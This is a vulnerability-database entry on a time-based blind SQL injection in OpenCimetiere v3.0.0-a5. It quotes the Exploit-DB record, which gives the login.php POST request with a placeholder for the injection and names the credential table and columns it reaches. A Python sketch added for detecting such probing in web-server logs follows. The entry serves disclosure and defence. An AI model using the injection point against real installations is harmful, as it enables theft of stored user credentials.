Vendor: OpenCimetiere
By: Wad Deek
CVSS: 8.8 (HIGH)
SQL Injection (Type: AND/OR time-based blind)
CWE: 89
Product Name: OpenCimetiere
Affected Version From: 3.0.0-a5
Affected Version To: 3.0.0-a5
Patch Exists: Yes
Related CWE: N/A
CPE: a:openmairie:opencimetiere:3.0.0-a5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Xampp with PostgreSQL on Windows 7
2016

OpenCimetiere v3.0.0-a5 | Blind SQL Injection

A blind SQL injection vulnerability was discovered in OpenCimetiere v3.0.0-a5. The vulnerability exists in the login.php script, which is vulnerable to an AND/OR time-based blind SQL injection attack. An attacker can exploit this vulnerability by sending a specially crafted POST request to the login.php script with a malicious SQL query in the login parameter. This can allow an attacker to gain access to the database and potentially execute arbitrary code.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of OpenCimetiere.

Exploit-DB raw data:

# Exploit Title: OpenCimetiere v3.0.0-a5 | Blind SQL Injection
# Date: 06/08/16
# Exploit Author: Wad Deek
# Vendor Homepage: http://www.openmairie.org/
# Software Link: http://www.openmairie.org/catalogue/opencimetiere/
# Version: 3.0.0-a5
+>3.0.0-a5<+ --> /opencimetiere/HISTORY.txt
# Tested on: Xampp with PostgreSQL on Windows 7
# Fuzzing tool: https://github.com/Trouiller-David/PHP-Source-Code-Analysis-Tools

################################################################
[SQL Injection (Type: AND/OR time-based blind)]
################################################################
[Database] opencimetiere
[Table] om_utilisateur
[Columns] login,pwd
{POST} "/opencimetiere/scr/login.php", "login.action.connect=Se%20connecter&came_from=&login=[SQLi]&password=paSSw0rd"
################################################################
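
A detection sketch for the issue described above, added here and not part of the original advisory or the OpenCimetiere code: time-based blind probing of the login form appears in web-server logs as many POSTs to /opencimetiere/scr/login.php from one client, split between fast responses and slow ones that cluster around one constant delay. The log format (Apache with `%D` appended), the thresholds, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

LOGIN_PATH = "/opencimetiere/scr/login.php"  # endpoint named in the advisory
# Assumed Apache LogFormat: %h %l %u %t "%r" %>s %b %D   (%D = microseconds)
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'\d{3} \S+ (?P<us>\d+)$'
)

def suspicious_clients(lines, min_requests=8, slow_s=3.0, min_slow=3, spread_s=1.0):
    """Return {ip: (total, slow_count)} for clients whose login POSTs show the
    timing profile of time-based blind probing: many requests, divided into
    fast answers and slow answers that sit within spread_s of each other."""
    durations = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if (not m or m["method"] != "POST"
                or m["path"].split("?", 1)[0] != LOGIN_PATH):
            continue
        durations[m["ip"]].append(int(m["us"]) / 1_000_000)
    flagged = {}
    for ip, secs in durations.items():
        slow = [s for s in secs if s >= slow_s]
        fast = len(secs) - len(slow)
        if len(secs) < min_requests or len(slow) < min_slow or fast < min_slow:
            continue  # too few requests, or no fast/slow split
        if max(slow) - min(slow) <= spread_s:  # near-constant delay, not server load
            flagged[ip] = (len(secs), len(slow))
    return flagged

def _line(ip, sec, us, path=LOGIN_PATH, method="POST"):
    # Helper that builds one constructed log line in the assumed format.
    return (f'{ip} - - [01/Jan/2024:10:00:{sec:02d} +0000] '
            f'"{method} {path} HTTP/1.1" 200 512 {us}')

# Constructed sample log: one probing client, one user with a single slow
# login, one busy but normal client. Addresses are documentation ranges.
SAMPLE_LOG = (
    [_line("192.0.2.10", i, 5_040_000 + i * 1000 if i % 2 else 42_000) for i in range(10)]
    + [_line("198.51.100.7", 20, 38_000), _line("198.51.100.7", 21, 6_900_000)]
    + [_line("203.0.113.5", 30 + i, 45_000) for i in range(9)]
)

if __name__ == "__main__":
    for ip, (total, slow) in suspicious_clients(SAMPLE_LOG).items():
        print(f"{ip}: {total} login POSTs, {slow} delayed by a near-constant interval")
```

Tune `slow_s` and `spread_s` against the normal latency of the login page; on an unpatched install a hit warrants reviewing the om_utilisateur credentials named in the advisory.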